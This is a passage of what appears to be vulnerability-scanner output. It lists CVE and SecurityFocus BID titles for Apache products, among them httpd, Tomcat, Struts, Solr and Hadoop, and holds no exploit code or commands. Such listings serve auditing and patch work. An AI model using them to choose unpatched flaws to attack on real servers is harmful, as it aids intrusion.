| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
|
| SecurityFocus - https://www.securityfocus.com/bid/:
| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
3661| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
3662| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
3663| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
3664| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
3665| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
3666| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
3667| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
3668| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
3669| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
3670| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
3671| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
3672| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
3673| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
3674| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
3675| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
3676| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
3677| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
3678| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
3679| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
3680| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
3681| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
3682| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
3683| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
3684| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
3685| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
3686| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
3687| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
3688| [100447] Apache2Triad Multiple Security Vulnerabilities
3689| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
3690| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
3691| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
3692| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
3693| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
3694| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
3695| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
3696| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
3697| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
3698| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
3699| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
3700| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
3701| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
3702| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
3703| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
3704| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
3705| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
3706| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
3707| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
3708| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
3709| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
3710| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
3711| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
3712| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
3713| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
3714| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
3715| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
3716| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
3717| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
3718| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
3719| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
3720| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
3721| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
3722| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
3723| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
3724| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
3725| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
3726| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
3727| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
3728| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
3729| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
3730| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
3731| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
3732| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
3733| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
3734| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
3735| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
3736| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
3737| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
3738| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
3739| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
3740| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
3741| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
3742| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
3743| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
3744| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
3745| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
3746| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
3747| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
3748| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
3749| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
3750| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
3751| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
3752| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
3753| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
3754| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
3755| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
3756| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
3757| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
3758| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
3759| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
3760| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
3761| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
3762| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
3763| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
3764| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
3765| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
3766| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
3767| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
3768| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
3769| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
3770| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
3771| [95675] Apache Struts Remote Code Execution Vulnerability
3772| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
3773| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
3774| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
3775| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
3776| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
3777| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
3778| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
3779| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
3780| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
3781| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
3782| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
3783| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
3784| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
3785| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
3786| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
3787| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
3788| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
3789| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
3790| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
3791| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
3792| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
3793| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
3794| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
3795| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
3796| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
3797| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
3798| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
3799| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
3800| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
3801| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
3802| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
3803| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
3804| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
3805| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
3806| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
3807| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
3808| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
3809| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
3810| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
3811| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
3812| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
3813| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
3814| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
3815| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
3816| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
3817| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
3818| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
3819| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
3820| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
3821| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
3822| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
3823| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
3824| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
3825| [91736] Apache XML-RPC Multiple Security Vulnerabilities
3826| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
3827| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
3828| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
3829| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
3830| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
3831| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
3832| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
3833| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
3834| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
3835| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
3836| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
3837| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
3838| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
3839| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
3840| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
3841| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
3842| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
3843| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
3844| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
3845| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
3846| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
3847| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
3848| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
3849| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
3850| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
3851| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
3852| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
3853| [90482] Apache CVE-2004-1387 Local Security Vulnerability
3854| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
3855| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
3856| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
3857| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
3858| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
3859| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
3860| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
3861| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
3862| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
3863| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
3864| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
3865| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
3866| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
3867| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
3868| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
3869| [86399] Apache CVE-2007-1743 Local Security Vulnerability
3870| [86397] Apache CVE-2007-1742 Local Security Vulnerability
3871| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
3872| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
3873| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
3874| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
3875| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
3876| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
3877| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
3878| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
3879| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
3880| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
3881| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
3882| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
3883| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
3884| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
3885| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
3886| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
3887| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
3888| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
3889| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
3890| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
3891| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
3892| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
3893| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
3894| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
3895| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
3896| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
3897| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
3898| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
3899| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
3900| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
3901| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
3902| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
3903| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
3904| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
3905| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
3906| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
3907| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
3908| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
3909| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
3910| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
3911| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
3912| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
3913| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
3914| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
3915| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
3916| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
3917| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
3918| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
3919| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
3920| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
3921| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
3922| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
3923| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
3924| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
3925| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
3926| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
3927| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
3928| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
3929| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
3930| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
3931| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
3932| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
3933| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
3934| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
3935| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
3936| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
3937| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
3938| [76933] Apache James Server Unspecified Command Execution Vulnerability
3939| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
3940| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
3941| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
3942| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
3943| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
3944| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
3945| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
3946| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
3947| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
3948| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
